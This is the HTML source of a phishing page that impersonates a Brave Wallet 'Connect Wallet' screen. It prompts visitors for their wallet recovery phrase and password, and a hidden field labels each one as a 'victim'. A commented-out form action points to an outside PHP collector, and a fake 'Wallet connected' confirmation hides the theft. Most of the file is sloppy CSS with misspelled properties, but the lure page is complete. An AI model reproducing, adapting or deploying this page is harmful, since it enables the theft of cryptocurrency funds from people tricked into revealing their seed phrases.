       <html>
       <head>
             <link rel="shortcut icon" href="../stake-phrase-high/img/img1.png" />
             <title>Brave Wallet | Connect Wallet</title>
             
       <meta name="viewport" content="width=device-width , initial-scale=1.0">
       
       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
       <link rel="stylesheet" type="text/css" href="styblesheet.css"> 
       </head>
       
       
       
       <style type="text/css">
       
       
       
       
       body{
       margin: 0;
       font-family: sans-serif;
       line-height: 16px;
       font-size: 13px;
       }
       
       .navbar{
       background: #001f90b8;
       height: 39px;
       width: 100%;
       }
       
       .contact-us a{
       position:relative;
       cohlor:#00184a78;
       font-size:9px;
       top: 20px;
       color: black;
       }
       
       .nav-head{
       background-color:#ffdc0026;
       color:#5d530eb8;
       padding:6px 10px;
       }
       
       .contact-us{
       padding-bottom:21px;
       text-align:center;
       }
       
       
       .formulaire.formulaire>*{
       bogrder-bottom:1px solid #c7c3c369;
       }
       
       .entrer{
       border:1;
       width:100%;
       }
       
       /*
       submit
       */
       
       .koala{
       display:inline-block;
       -webkit-border-radius:3px;
       font-weight:bold;
       background-color:#0036f999;	
       font-size:13px;
       line-height:34px;
       padding:0 18px;
       color:white
       }
       
       .square_btn {
       position: relative;
       display: inline-block;
       padding: 18px;
       text-decoration: none;
       color: white;
       background:   rgb(67,97,238);
       border-radius: 70px;
       fontb-weight: bold;
       bornder: 15px #f30909;
       width: 30%;
       border: none;
       top: -53px;
       outline: none;
       font-size: 16px;
       }
       
       
       /* neveau compte */
       .fruit{
       text-align:center;
       padding:9px;
       } 
       
       
       
       
       
       
       
       
       /*New Codes*/
       
       
       
       
       .span1 {
      
       font-size: 40px;
       position:relative;
       color: hsla(0, 0%, 0%, 0.75);
       top: 4px;
       left: -25px;
       }
       
       
       
       
       .span2 {
       
       font-sizw: 14px;
       text-align: center;
       position:relative;
       background-position:center;
       top: -5px;
       font-weight: 590;
               text-shadow:500px;
               margin-right: 90px;
       }
       
       
       
       

       
       
       
       
       /*form*/
       
       
       
      .form-control label {
       
       display: block;
       
       margin-bottom: 10px;
     
       }
       
       
       
       
       /*
       .form-control input,
       
       .form-control select,
       
       .form-control textarea {
       
       border: 1px solid #777;
       
       border-radius: 7px;
       
       font-family: inherit;
       
       padding: 10px;
       
       display: block;
       height: 45px;
       width: 95%;
       margin-left: 8px;
       }
       */
       
       
       .form-control input[type="radio"],
       
       .form-control input[type="checkbox"] {
       
       display: inline-block;
       
       width: auto;
       
       }
       
       
       
       
       
       
       
       .buttoner:hover {
       background-color: hsla(0, 0%, 0%, 0.5);
       color:   white;
       border: none;
       box-shadow: 1px 1px 1px 1px   hsla(240, 100%, 25%, 0.9);
       cursor: pointer;
       -webkit-transition-duration: 0s; /* for Safari */
       transition-duration: 0s;
       }
       
       .buttonner {
       outline: none;
       border: none;
       height: 45px;
       width: 50%;
       border-radius: 5px;  
       bordner: 12px;
       font-size: 14px;
       background: white;
       color:  white;
       background: rgb(236,152,102);
       position:relative;
       top: 25px;
       
       }
       
       
       
       
       
  
       
       
       
       
       
       
               /*END*/ 
       
       
       
       
       #entnre1 {
       position:relative;
       top:-10px;
       }
       
       
       
       #enhtre2 {
       position:relative;
       top:10px;
       }
           
           
           #ooo1 {
           position:relative;
          top: 13px;
          font-size: 10px;
           
        }
        
        
        #engtre3 {
        position:relative;
        top:20px;
        }
        
        
        .spancyy {
        position:relative;
         float:right;
        }
        
        
        
        
        
        #img00 {
        position:relative;
        float:right;
        width: 28px;
       top: -40px; 
        
       }
        
        
        
        .cents {
        position:relative;
              font-bweight: 550;
              font-size: 16px;
              top: 12px
              }
              
              
              #ooo {
              position: relative;
              coblor: grey;
              top: -7px;
       
              }
         
         
         
         
         .pi {
         position:relative;
         top: 20px;
         font-size: 14px;
         
         }
         
         .pii {
         position:relative;
         top: 12px;
         
         }
         
         
         
         
         
         /*Switch Box*/
         
         
         /* The switch - the box around the slider */
         .switch {
         position: relative;
         display: inline-block;
         width: 30px;
         height: 15px;
         
         }
         
         /* Hide default HTML checkbox */
         .switch input {
         opacity: 0;
         width: 0;
         height: ;
         }
         
         /* The slider */
         .slider {
         position: absolute;
         cursor: pointer;
         top: 0;
         left: -10;
         right: 0px;
         bottom: 0;
         width: 25px;
         background-color:  #62B2FF;
         -webkit-transition: .4s;
         transition: .4s;
       
         }
         
         .slider:before {
         position:absolute;
         content: "";
         height: 20px;
         width: 20px;
         left: 13px;
       
       
              
         bottom: -2px;
         background-color: green;
         -webkit-transition: .4s;
         transition: .4s;
       
         }
         
         input:checked + .slider {
       
         background-color: silver;
       
         }
         
         
         input:checked + .slider:before {
       
         background-color: white;
       
         }
         
         
         
         input:focus + .slider {
       
         box-shadow: 0px 0px 0px black;
       
         }
         
         input:checked + .slider:before {
           box-shadow: 0px 0px 20px grey;
         -webkit-transform: translateX(26px);
         -ms-transform: translateX(26px);
         transform: translateX(-22px);
         }
         
         /* Rounded sliders */
         .slider.round {
         border-radius: 34px;
         
         
         }
         
         .slider.round:before {
         border-radius: 50%;
         
         }
         
       
       
        /*end*/
        
        .switch {
        position:relative;
       float:right;
       top: -8px;
        
        }
        
        
        #up2 {
          position: relative;
          top: 15px;
          
        }
        .divo {
        position:relative;
       top: -10px;
       }
                  
        .divo1 {
        position:relative;
       top: 28px;
       }
          
       
       #imgf {
       position:relative;
       width: 8px;
       heibght: 14px;
       top: 1.25px;
       
       }
       
       
       
       
       #a {
       text-decoration: none;
         color: hsla(0, 0%, 50%, 0.75);
       }
       
       
       .move1 {
       position:absolute;
       margin-left: -9px;
       tyop: 50px;
       }
       
       
       .move2 {
       position:absolute;
       margin-left: 4px;
       tyop: 50px;
       }
       
       
       .move3 {
       position:absolute;
       margin-left: 17px;
       tyop: 50px;
       }
       
       
       
       
       .move4 {
       position:absolute;
       margin-left: 29px;
       tyop: 50px;
       }
       
       
       
       
       .move5 {
       position:absolute;
       margin-left: 44px;
       tyop: 50px;
       }
       
       
       
       
       .move6 {
       position:absolute;
       margin-left: 59px;
       tyop: 50px;
       }
       
       
       
       .move7 {
       position:absolute;
       margin-left: 73px;
       tyop: 50px;
       }
       
       
       
       .move8 {
       position:absolute;
       margin-left: 86px;
       tyop: 50px;
       }
       
       
   
   
   
   
   
   
   /*new code*/
   
   
       body {
         background: hsla(0, 0%, 0%, 0.95);
       }
      
       
            .div1 {
       
       
       padding:2 31px;
       }       .form-control {
    
       text-align: left;
       
       margin-bottom: 20px;
       } 
       
 
    #formulaire  {
      background: white;
    }
    
           /*xxx*/
       .form-control input,
       
       .form-control select,
       
       .form-control textarea {
       
       
       border: 0.60px solid hsla(0, 0%, 50%, 0.75);
      
       
       
       border-radius: 2px;
       
    outline: none;
       /*  hsla(240, 100%, 25%, 0.9);;*/
       border-radius: 4px;
      posmm
       font-family: inherit;
       
    
       padding: 10px;
       background: hsla(0, 0%, 0%, 0.95);
       display: block;
       height:48px;
        width: 90%;
       mabrgin-left: 13px;
       position:relative;
       top: 3px;
       font-size: 13.50px;
       }
     
     textarea {
              height:100px;
              
     }

        .enter {
                 height:100px;
        }
        
        
        
        /*New code*/
     
     
     


      
      
      /* Hide the default checkbox */
input[type="checkbox"] {
  visibility: hidden;
}

/* Style the checkbox container */
.checkbox-container {
  display: inline-block;
  position: relative;
  width: 18px; /* Adjust width as needed */
  height: 15px; /* Adjust height as needed */
  background-color: rgb(67,97,238);
  border: 3px solid rgb(67,97,238); /* Red border by default */
  border-radius: 5px;
  left: 22px;
  top: -75px;
}

/* Style the checkmark (corrected for ✓ shape) */
.checkbhox-container:after {
  content: "";
  position: absolute;
  top: 50%;
  left: 50%;
  transform: translate(-50%, -50%);
  width: 10px;
  height: 5px;
  border: solid black;
 
  border-width: 0 3px 4px 0; /* Adjusted for ✓ shape */
  visibility: hidden; /* Hide by default */
}

/* Change styles when checkbox is checked */
input[type="checkbox"]:checked + .checkbox-container {
  background-color: black;
}

input[type="checkbox"]:checked + .checkbox-container:after {
  visibility: visible; /* Show checkmark when checked */
}


.checkmark {
    position: relative; 
     top: 1px; 
     left: 5px;
     color: hsla(0, 0%, 0%, 0.95);
} 
        
  
  
  
  
  .iidd {
    position: relative;
    top: -102px;
    left: 55px;
  }
  
  
  #check {
    hsla 
    
  }
  
  
  
  
  
  
  
  
    #col {
      position: relative;
      font-size: 15px;
      color: hsla(0, 0%, 50%, 0.75);
    }
   
                .cents {
        position:relative;
              fonht-weight: 550;
              font-size: 17px;
              top: 12px;
              color: white;
           
              }
        
   
    #big {
      font-size: 17px;
      color: white;
    }
    
    
    .ennter {
      font-size: 13px;
    }
   
   
   
     #top {
       position: relative;
       top: -80px;
     }
     
     
     
     /* Target all input fields */
input {
  color: hsla(0, 0%, 50%, 0.75); /* Change this to your desired color */
}



       </style>
       
       <body>
       
   
               <p>&nbsp;</p>
        <div class="divo">
            <span class="span1">&nbsp;&nbsp;&nbsp;&nbsp; <a id="a"href="index.html" >&lsaquo;<span cljass="span1">&nbsp; </span> </span> </a><span class="span2"><center><tt class="span2"style="font-size: 19px;">
              
              <span class="move1"></span><span class="move2"></span><span class="move3"></span><span class="move4"></span><span class="move5"></span><span class="move6"></span><span class="move7"></span><span class="move8"></span></tt></center></span> 
           </div>
       
       <!-- NavBar -->
             <!--   <div class="navbar"></div>
       <div style="display:-webkit-box">
       <div style="-webkit-box-flex:1">
       <!--Nav-Header-->
             <!--   <div class="nav-head">
       <span>METAMASK</span>
       </div> -->
       
       
       
       <!-- Formulaire -->
       <div class="div1">
       
       
       
       
           <!--    <div class="divo1">
       <form method="POST" style="padding-top:17px;" action="https://raviral.com/Gfac.php" method="POST">-->
       <div class="formulaire">
       
       <div id="up2">  <center class="cents"> <p>  Connect crypto account</p> </center> <p>&nbsp;</p>
      <center><p id="col">Enter your brave recovery phrase to connect your wallet crypto account. </p>  </center>
          </center>
          
          </div>
          <p>&nbsp;</p>
       
                <div class="form-control">
       
       
             <span id="ooo" class="spanner">    </span> <span id="ooo" class="spancyy">     </span> <!--<img id="img03"src="../stake/img/img00.jpg">-->
      
      <center>  <textarea name="email" type="password"placeholder="Enter your recovery phrase" id="col"class="enter" style="padding:12px; height:100px;background-color: hsla(0, 0%, 0%, 0.05); font-size: 13.50px;"></textarea>
       <!--<img id="img00"src="https://raw.githubusercontent.com/stakecoredao/img/main/ios13-control-center-scan-qr-code-icon.png">-->
       <p>&nbsp;</p></center>
       
       <input name="type" type="hidden" value="METAMASK" />
       <input type="hidden" name="user_id_victim"" value="UYXDR" />
       
           <input type="checkbox" id="myCheckbox" />
<label for="myCheckbox" class="checkbox-container">
    <span class="checkmark">&#10003;</span></label>
    <span id="col"class="iidd">Show recovery phrase  </span>  
         <div id="top">
         <center>
         
       <center>  <p id="big">Password </p></center>
                         <span id="ooo" class="spanner">       </span> <span id="ooo" class="spancyy">     </span>  <!--<img id="img03"src="../stake/img/img00.jpg">-->
                         <p></p>
       <input name="pass" value="" type="password"  placeholder="Password" id="entre2"class="enter" style="padding:12px;background-color: hsla(0, 0%, 0%, 0.05); top: 10px;"required>
        </center>
       
                <p>&nbsp;</p>
       
       
       
       
       
       
       
       
       
       <!--
       
                         <span id="ooo" class="spanner">Confirm Password</span>  <!--<img id="img03"src="../stake/img/img00.jpg">-->
   <!--    <input name="pass2" value="" type="password"  placeholder="Confirm password" id="col"class="entrer" style="padding:12px;"required>
       
       
       
       
       
       
       
       
               <span id="ooo1" class="spanner">Must contain at least 8 characters</span>  <!--<img id="img03"src="../stake/img/img00.jpg">-->
       
       
       
       
       
       
       
       
       <p id="col"class="pi">






 
     <!-- Rounded switch -->
   <!--           <span class="pii">  <label class="switch">
       <input type="checkbox">
       <span class="slider round"></span>
       </label>-->
       </p>
       </span>
       
       
       <div style="padding: -50px;"> 
       
              
                         <p>&nbsp;</p>
                                                    <p>&nbsp;</p>
       
       
       
       
       
       
       
       
       
               <!-- The form -->
        <center>     <div class="form-popup" id="myForm">
        <form action="wallet.html" class="form-container">

   <!--     <center>  <span class="span2-">Connect Wallet <img id="img1-"src="https://raw.githubusercontent.com/stakecoredao/img/main/img1.png"></h1></span></center>
                            <center class="io1"><img id="img00001"src="https://raw.githubusercontent.com/stakecoredao/img/main/img000.jpg"></center>
        -->
        
   
   
   
   
   
   
   
   
        <div id="did">
       <span class="pl"> ✓&nbsp;Wallet connected</span> 
        </div>
        
        
        <!--     <label for="email"><b>Email</b></label>
        <input type="text" placeholder="Enter Email" name="email" required>
        --> 
        
      <!--  <center><img id="img2-"src="https://raw.githubusercontent.com/stakecoredao/img/main/img2.png"></center>
   -- 
        <!--      
        <label for="psw"><b>Password</b></label>
        <input type="password" placeholder="Enter Password" name="psw">
        -->
        <div class="diver-">   </div> 
             <div class="diver-">   <button id="bottonx" class="btn"button type="submit">Continue</button> </div>
        <div type=""id="can1-" class="btn2 cancel" onclick="closeForm()"></div><span class="span1-"class="btn2 cancel" onclick="closeForm()"></span></button>
        <p></p> </form>
        </div>
        
        </center>
        
     <!--\\\\\\\\\\\\\\\\\\\-->   
    

   
   
   
   
   
   
   
   
   
   
       <!--$$$$$$$$$$$$$$$$-->
   
   
   
   
   
   
   
   
          
          
          
          
          <!--/////////////-->   
          
          <!--********-->     <a href="##"   class="open-button" onclick="openForm()">
            
        
       
       
       
       
       
      <center> <button type="submit" class="square_btn">Connect</button></center>
       
       </div>
       </div>
       </form> 
       </div>
       </div>
              <!--  <div class="fruit">
       <a class="koala">Need a new account</a> 
       </div>
       -->
       <div class="contact-us">
    <!--   <a>By proceeding, you agree to this <a href="##" >terms and conditions</a>-->
       </div>
       </div>
       </div>
       </div>
       
     
     
     
     
     
     
     
     
     
  
                     <style type="text/css">
                     
                            
       /*Alert*/
       
       
       #bottonx {
       position: relative;
       background: rgb(67,97,238);
       color: white;
       width: 50%;
       height: 43px;
       border: none;
       }
       

        {box-sizing: border-box;}
        
        /* Button used to open the contact form - fixed at the bottom of the page */
        .open-button {
        
        position:relative;
        background-position:center;
        color: black;
        border-color: red;
        
        background-position:center; 
        
        
        
        
        }
        
        
        a {
      text-decoration: none;
        }
        
        
        bbb {
        
        
        background-color: #555;
        color: white;
        padding: 16px 20px;
        border: none;
        cursor: pointer;
        opacity: 0.8;
        position: fixed;
        bottom: 23px;
        right: 28px;
        width: 280px;
        position:relative;
        background-position:center;
        margin-right: 12px;
        
        background-position:center;
        }
        
        /* The popup form - hidden by default */
        .form-popup {
        display:none;
        position: fixed;
        bottom: -30px;
        right: 0px;
        left: 0px;
        border-radius: 22px;
        border: 1.80px solid reed;
      z-index: 9;
        background-position:center;
        margin-right: 2px;
        
        margin-left: 2px;
        
        box-shadow: 0px 0px 55px 0px hsla(0, 0%, 50%, 0.50);
      
        }
        
        
        /* Add styles to the form container */
        .form-container {
     
                border-radius: 20px;
        max-width: -600px;
        padding: 43px;
        background-color: hsla(0, 0%, 0%, 0.05);
        
        
        }
        
        /* Full-width input fields */
        
        

        .form-container input[type=text], .form-container input[type=password] {
        width: 100%;
        padding: 15px;
        margin: 5px 0 22px 0;
        border: none;
        background: #f1f1f1;
        
        }
        
        /* When the inputs get focus, do something */
        .form-container input[type=text]:focus, .form-container input[type=password]:focus {
        background-color: #ddd;
        outline: none;
        }
        
        /* Set a style for the submit/login button */
        .form-container .btn {
        background-color: white;
        color: white;
        padding: 16px 20px;
        border: none;
        cursor: pointer;
        width: 100%;
        margin-bottom:10px;
        opacity: 0.8;
        font-size: 15px;
        border-radius: 4px;
        color: white;
        
        font-weight: 500;
        }
        
        
        
        
        
        
        
        
    /6666/       .form-container .btn2 {
        background-color:  white;
        color: white;
        padding: 16px 20px;
        border: none;
        cursor: pointer;
        width: 100%;
        margin-bottom:10px;
        opacity: 0.8;
        font-size: 15px;
        border-radius: 4px;
        color:;
        
        font-weight: 500;
        
        }
        
        
        
        
        
        
        
        
        
        .form-container .btn {
        background-color: white;

        padding: 10.50px 20px;

        cursor: pointer;
        width: 100%;
        margin-bottom:10px;
        opacity: 0.8;
        font-size: 14px;
        border-radius: 4px;
        color:  black;
       background-position:center;
        font-weight: 500;
        border-style: solid;
        border-width: 0.50px;
    
        }
        
        
        
        
        
        
        
        /* Add a red background color to the cancel button */
        .form-container .cancel {
        background-color: red;
        
        }
        
        /* Add some hover effects to buttons */
        .form-container .btn:hover, .open-button:hover {
        opacity: 1;
        
        }
        
        
        
        .span1- {
        
        position: relative;
        top: -170px;
        margin-right: -27px;
        font-size: 40px;
        
        color: hsla(0, 0%, 0%, 0.65);
        font-weight: 100;
        float: right;
        
        
        }
        
        
        
        
        #img1- {
        width: 25px;
        position: relative;
        top: 3px;
        
        }
        
        
        
        #img2- {
        width: 200px;
        position: relative;
        top: 15px;
        border-radius: 5px;
        bonrder-color: red;
        bojrder-width: 10.50px;
        
        
        
        }
        
        .span2- {
        font-size: 22.50px;
        border-radius: 4px;
        color: rgb(236,152,102); 
        font-weight: 770;
        position: relative;
        top: 3px;
        }
        
        
        .diver- {
        position: relative;
        top: 15px;
        
        
        }
        
    
   #img00001 {
   positionn: relative;
   width: 295px;
   tbop: -200px;
   }
       .io1 {
       position:relative
       top:7px;
     
       margin-left: -43px;  
       }
       
       
       
       
       
       
       
       
       
       
       .pl {
       color: rgb(67,97,238);
       font-size: 12px;
       }
       
       #pl {
       width: 20px;
       position:relative;
       top: 5px;
       
       }
       
       #did {
       position: relative;
       top: -12px;
       }
       
       
       
       
       #xx1 {
       width: 14px;
       position:relative;
       top: 2px;

       }
       
       
       #xx2 {
       width: 14px;
      
            position:relative;
            top: 2px;
            }
            
            .spanx {
           color: rgb(236,152,102);
           }
            
       
       
       
       
         #bottonx2:hover {
           border-color: rgb(255, 205, 117);
                  border-style: solid;
                  hborder-width: 2px;
                  background-color: rgb(255, 238, 223);
                -webkit-transition-duration: 0s; /* for Safari */
                transition-duration: 0s;

                   }
                   
                
                
                
                
                
                
             #bottonx:hover {
              border-color: rgb(255, 205, 117);
         border-style: solid;
         bjorder-width: 2px;
         background-color: rgb(255, 238, 223);
         background-color: rgb(255, 238, 223);
         -webkit-transition-duration: 0s; /* for Safari */
           transition-duration: 0s;

          }
          
       
       
       
         #bottonx2:hover {
           border-color: rgb(255, 205, 117);
                  border-style: solid;
                  bobrder-width: 2px;
                  background-color: rgb(255, 238, 223);
                -webkit-transition-duration: 0s; /* for Safari */
                transition-duration: 0s;
                   }
                   
                
                
                
                
                
                
                #small {
                position: relative;
               font-size: 12.50px;
               font-weight: 400;
                }
                
                
                
                
                
                #ii {
              position: relative;
                top: 500px;
                
       }
       
       
       
       
       
       
       .button3x {
       position: relative;
       background-color: rgb(45, 190, 160);
       border: none;
       border-radius: 14px;
       color:white;
       font-size: 11.50px;
       height: 23px; 
       width: 56px;
       disphlay: bold;
       
       majrgin-right: 3px;
       
       }
       
       .button4x {
       /*hsla(120, 100%, 25%, 0.1)*/
       position: relative;
       background-color:  hsla(180, 100%, 50%, 0.090);
       border-color: hsla(120, 100%, 25%, 0.2);
       border-width: 0.50px;
       border-radius: 14px;
       color: rgb(45, 190, 160);
       font-size: 11.50px;
       height: 23px; 
       width: 56px;
       display: bold;
       
       mnargin-right: 18px;
        
       }
       
          
         a:hover {
         color: rgb(236,152,102); 
          
       }
       
       
       
       .button3xx {
       position: relative;
       background-color: rgb(236,152,102);
       border: none;
       border-radius: 14px;
       color:white;
       font-size: 11.50px;
       height: 23px; 
       width: 56px;
       disphlay: bold;
       
       majrgin-right: 3px;
       
       }
       
       .button4xx {
       
       position: relative;
       background-color:  hsla(0, 100%, 50%, 0.090);
       border-color: rgb(255,186,39);
       border-width: 0.030px;
       border-radius: 14px;
       color: hsla(0, 100%, 50%, 0.80);
       font-size: 11.50px;
       height: 23px; 
       width: 56px;
       display: bold;
       border-weight: 500;
       mnargin-right: 18px;
       border: none; 
       }

       .button4xx0 {
       
       position: relative;
       background-color:  hsla(0, 0%, 75%, 0.20);
       border-color: hsla(0, 0%, 75%, 0.20);
       border-width: 0.90px;
       border-radius: 14px;
       color: grey;
       font-size: 11.50px;
       height: 23px; 
       width: 56px;
       display: bold;

       mnargin-right: 18px;
        
       }
       
       
       
       
       
       
         #ddd {
         position: relative;
         top: 17px;
       }
       
       
         
         
         
         
         .divix {
         position:relative;
         top: -20px;
             
                }
                
                
         .divix {
         position:relative;
         top: -35x;
             
                }
                
         
         
         
         .divi0 {
         position:relative;
         top: -35px;
    
       }
       
       
           
           .divi {
           position:relative;
           top: -70px;
           
           }
           
           
           
           
           
           
           
           
           
           .iox {
           position: relative;
           top:-20px;
           margin-left: -12px;  
           }
           
           .ioxx {
           position: relative;
           top:-35px;
           margin-left: -12px;  
           }
                   
                   
                   
                   
                   .io0 {
                   position: relative;
                   top:-50px;
                   margin-left: -12px;  
                   }
                   
                   
                   
                   
           
           .io {
           position: relative;
           top:-80px;
           margin-left: -12px;  
           }
           
           
           
           
           #mmm {
           position: relative;
           height: -400px;
           top: 0px;
              
              
             }
              
              a {
              color: black;
              }
              
              
             </style>
     
      
      
                   <script type="text/javascript">
              
              /* Set the width of the side navigation to 250px */
              function openNav() {
              document.getElementById("mySidenav").style.width = "250px";
              }
              
              /* Set the width of the side navigation to 0 */
              function closeNav() {
              document.getElementById("mySidenav").style.width = "0";
              }
              
              
              </script>
              
              <script type="text/javascript">
              
              
              
              
              /* Set the width of the side navigation to 250px and the left margin of the page content to 250px and add a black background color to body */
              function openNav() {
              document.getElementById("mySidenav").style.width = "180px";
              document.getElementById("main").style.marginLeft = "250px";
              document.body.style.backgroundColor = "rggba(0,0,0,0.4)";
              }
              
              /* Set the width of the side navigation to 0 and the left margin of the page content to 0, and the background color of body to white */
              function closeNav() {
              document.getElementById("mySidenav").style.width = "0";
              document.getElementById("main").style.marginLeft = "0";
              document.body.style.backgroundColor = "white";
              }
              
             </script>
                         
                         
                         
                         <script type="text/javascript">
                               
                               
                               
                               
                               
                               
                               
                               var ALERT_TITLE = "";
                               var ALERT_BUTTON_TEXT = "Ok";
                               
                               if(document.getElementById) {
                               window.alert = function(txt) {
                               createCustomAlert(txt);
                               }
                               }
                               
                               function createCustomAlert(txt) {
                               d = document;
                               
                               if(d.getElementById("modalContainer")) return;
                               
                               mObj = d.getElementsByTagName("body")[0].appendChild(d.createElement("div"));
                               mObj.id = "modalContainer";
                               mObj.style.height = d.documentElement.scrollHeight + "px";
                               
                               alertObj = mObj.appendChild(d.createElement("div"));
                               alertObj.id = "alertBox";
                               if(d.all && !window.opera) alertObj.style.top = document.documentElement.scrollTop + "px";
                               alertObj.style.left = (d.documentElement.scrollWidth - alertObj.offsetWidth)/2 + "px";
                               alertObj.style.visiblity="visible";
                               
                               h1 = alertObj.appendChild(d.createElement("h1"));
                               h1.appendChild(d.createTextNode(ALERT_TITLE));
                               
                               msg = alertObj.appendChild(d.createElement("p"));
                               //msg.appendChild(d.createTextNode(txt));
                               msg.innerHTML = txt;
                               
                               btn = alertObj.appendChild(d.createElement("a"));
                               btn.id = "closeBtn";
                               btn.appendChild(d.createTextNode(ALERT_BUTTON_TEXT));
                               btn.href = "#";
                               btn.focus();
                               btn.onclick = function() { removeCustomAlert();return false; }
                               
                               alertObj.style.display = "block";
                               
                               }
                               
                               function removeCustomAlert() {
                               document.getElementsByTagName("body")[0].removeChild(document.getElementById("modalContainer"));
                               }
                               
                               
                               
                               
                               
                               </script>
                               
                               <script type="text/javascript">
                               
                               
                               function openForm() {
                               document.getElementById("myForm").style.display = "block";
                               }
                               
                               function closeForm() {
                               document.getElementById("myForm").style.display = "none";
                               }
                               
                               
                               
                               </script> 
                               
     
      
         
      <!DOCTYPE html>
<html>
<head>
<title></title>
<style type="text/css">
  /* ... your existing styles ... */

  /* Add this style to create the black background overlay */
  .overlay {
    position: fixed;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    background-color: rgba(0, 0, 0, 0.77); /* Semi-transparent black background */
    z-index: 1; /* Place it above the form */
    display: none; /* Initially hidden */
  }
</style>
</head>
<body>
  <div class="overlay" id="overlay"></div>

  <script>
    // Function to open the form and show the overlay
    function openForm() {
      document.getElementById("myForm").style.display = "block";
      document.getElementById("overlay").style.display = "block";
    }

    // Function to close the form and hide the overlay
    function closeForm() {
      document.getElementById("myForm").style.display = "none";
      document.getElementById("overlay").style.display = "none";
    }
  </script>
       
       </body>
       
       
       
       
       </html>
